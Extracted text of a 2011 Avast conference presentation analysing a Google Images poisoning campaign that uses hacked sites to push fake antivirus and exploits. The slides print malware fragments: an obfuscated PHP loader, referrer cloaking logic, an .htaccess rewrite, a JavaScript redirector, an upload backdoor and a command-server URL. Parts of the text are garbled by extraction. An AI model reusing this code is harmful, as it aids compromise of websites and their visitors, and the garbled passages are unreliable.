Poisoning Google images

Analysis of Google Images
Poisoning

Lukáš Hamík
Jan Širmer

www.avast.com

Agenda
• What is Google-images poisoning?
• How it works
• Doorway generator
• Java script redirector
• Evolution
• Data from AVAST CommunityIQ userbase
• Summary
• Questions

AVAR 2011 www.avast.com

Google Images poisoning
• SEO blackhat poisoning attack
• Uses hacked sites to redirect users to sites containing
fake AV or exploit
• Uses key-word rich pages with hot-linked images for
higher indexing by search bots
• Images from hacked sites are near the top search
results
• Focused on users coming from well-know search
engines


User

How it works?

Infected server


Google search results


User

Infected server

Fake AV Remote server


Fake antiviruses


User

Infected server

Fake AV Remote server
Bad guy

Why is it so successful?
• Great SEO and nobody umed SEO for “imagem”


Why is it so successful? (2)
• Computer users do not expect that they can get
infected when searching for images on legitimate sites

Infected
Fake AV server


Why is it so successful? (3)
• Hide and Seek
– if users are using Opera browser or they are coming from
Google, Yahoo or a Bing, they are served a Java script
redirector

Malicious
content

Your website gets infected
• The bad guys are using stolen FTP credentials
• They upload PHP script to the WEB server
• This is used for uploading malicious content to the
web server, creating spam pages, and uploading
additional files to web server
• Bonus feature - it lets the owners know that the page
is ready


Additional malicious files
• Xmlrpc.txt – Remote server address
stored
• -> Xml.txt -> Xml.cgi – address in
Base64
• Iog.txt – Redirecting java script stored
• Shab100500.txt – Spam HTML template
stored
• -> Don.txt – HTML template in
Base64

PHP script on infected sites
• Earlier, they used names such as d{1,3}.php
• Today, they use names like microphone.php, etc.
• This script is responsible for:
1. Creating spam pages for Google bot indexing
2. Changing .htaccess
3. Serving redirect script to user to exploit sites
4. Serving redirect script to user to fake AV
5. Downloading malicious files to server
6. Telling owners that the site is ready


PHP script
Original PHP file uploaded to server
• <?eval
(gzuncompress
(base64_decode('eNqVWG2P4kYM/…/woBlZVj
C9zK2Ok8McOZrF5z9hfM+5P/AbQiT9I=')
)
);
?>


PHP script
PHP file after first step of deobfuscation

• $GLOBALS['_1600532410_']=Array(base64_dec
ode('ZXJyb3Jfcm'.'Vwb3J0'.'aW5'.'n

• Function _1070120820($i)
{$a=Array('c'.'Q='.'=','cQ==',

• ($GLOBALS['_1600532410_'][16](
_1070120820(6))) {…


PHP script after removing
obfuscation
if (strpos($_SERVER['HTTP_USER_AGENT'],
'Opera') !== false) {
}
if (strpos($_SERVER['HTTP_REFERER'],
'google.') ||
strpos($_SERVER['HTTP_REFERER'],
'yahoo.') ||
strpos($_SERVER['HTTP_REFERER'], 'bing.')
> 0) {
$_10 = file_get_contents('.log/' . $_4 .
'/xmlrpc.txt');


Doorway generator
• HTML template is stored in the file
.log/SITE/shab100500.txt
• In the new version, shab100500.txt was replaced by
don.txt
<HTML>
Lorem ipsum dolor sit amet, consectetur adipisicing elit, sed do eiusmod tempor incididunt ut
labore et dolore magna aliqua. Ut enim ad minim veniam, quis nostrud exercitation ullamco
laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in
<Replaceme>
</Replaceme>
</HTML>

www.avast.com

Doorway generator

• Get descriptions of top
40 ‘mearch keywordm’ harmful action
from Google web against a person or
group in response
• Shuffle the words into revenge to a
their descriptions to get grievance, be it real
unique text or rick santorum
perceived

www.avast.com

Doorway generator

• Get top 20 ‘mearch <img
keyword’ from Google src="http://SITE/p
Images and extract links ath/hot-linked-
to image files image.jpg"
• Generates <img> tags alt="search
and shuffle them keywords"
align="random(cent
er, right, left)">

www.avast.com

Doorway generator

<img
harmful action against aharmful action
src="http://SITE/p
person or group in against a person or
ath/hot-linked-
response revenge to a group in response
image.jpg"
grievance<img revenge to a
alt="search
src="http://SITE/path/hot-
grievance, be it real
keywords"
linked-image.jpg" or rick santorum
align="random(cent
alt="search keywords" perceived
er, right, left)">
align="random(center, right
, left)">

www.avast.com

Doorway generator
<HTML>
laboris nisi ut aliquip ex ea commodo consequat. Duis aute irure dolor in reprehenderit in

<h1>SEARCH KEYWORD</h1>
Suggested links
<Replaceme>
Links to 30 most recently generated links
</Replaceme>
Rich-word generated text with hot-linked images
Links to alternative pages


</HTML>

www.avast.com

How do they make image URLs
less suspicious?
• "RewriteEngine On RewriteCond
%{REQUEST_FILENAME} !-f RewriteCond
%{REQUEST_FILENAME} !-d RewriteRule ^(.*)$
".$_SERVER[ 'SCRIPT_NAME'."?q=$1 [L] “

• this changes URL from suspicious
http://SITE/wp-admin/BAD.php?q=search-keywords
to
http://SITE/wp-admin/search-keywords


PHP script evolution
• The first version was focused on all users using Opera
browser or users coming from Google, Yahoo or Bing
• During June, we found some changes in PHP code
- Google is the only target
- New redirection system
• Request goes to a remote server ( mydiarycom.net )
- centralized
• They have statistic data from parameters
• No need to update iog.txt (redirecting script) or make
differentiating changes on each server


Data parameters
http://mydiarycom.net/out/stat.cgi?parameter=
1. Name of the doorway site
2. The full URL of doorway script
3. Vimitor’m IP
4. The referring URL
5. The User-Agent of the umer’m browmer
6. The search query used on Google


IP address and user-agents

Fake AV


IP address and user-agents

Spam
page


JavaScript redirector
var URL = “SITE contains FakeAV”
+encodeURIComponent(document.referrer)
+"&parameter=$keyword&se=$se&ur=1&HTTP_REF
ERER=“
+encodeURIComponent(document.URL)
+"&default_keyword=default";
if (window!=top)
{top.location.href = URL;}
else
document.location= URL;


Redirection
• Mac – http://IP/r/RANDOM_STRING
IP and ‘r’ are change enery 30 minutem

• Exploit site -
http://SITE/index.php?tp=RANDOM_STRING
Site and ‘tp’ are change enery 30 minutem

• Fake AV – http://SITE/fast-scan/


Other changes
• Rotating user-agent string
• Password-protected maintenance request
Someone who know how this algorithm works can
easily change it and redirect to his or her own site
• Xml.txt was replaced by xml.cgi
• Working with free blogs sites


Password-protected maintenance
request
if ($_GET[ 'dom100500' != '' { $_13 = fopen( '.log/'$_4.
'/xmlrpc.txt' 'w+'; fwrite($_13,$_GET[ 'dom100500');
fclose($_13);
if ($_GET[ 'up100500' != '' { $_14 = '' $_14 = $_14 .
basename( $_FILES[ 'uploaded'[ 'name') ;
$_15=round(0+0.5+0.5);
if(move_uploaded_file($_FILES[ 'uploaded'[
'tmp_name', $_14))


Data from the
AVAST CommunityIQ
• From March to August 2011, we discovered 22,580
unique infected sites
• 5,698 sites are still infected

• Typo : <IMG HEIGTH=?1?WIDTH


Infected domains


Number of infected domains


Summary
• Google-image poisoning is an easy way how to spread
fake AV and exploits
• It’m bamed on mtolen FTP credentialm of webmamterm
and great backdoor algorithms
• The number of infected legitimate domains is growing
every day
• Common sense is not sufficient protection


Questions and Answers


Thank you
Jan Sirmer (sirmer@avast.com)
Senior Virus Analyst

Lukas Hasik (hasik@avast.com)
QA Director


Poisoning Google images

Recomendados

Recomendados

Mais conteúdo relacionado

Mais procurados

Mais procurados (18)

Destaque

Destaque (6)

Semelhante a Poisoning Google images

Semelhante a Poisoning Google images (20)

Último

Último (20)

Poisoning Google images

Notas do Editor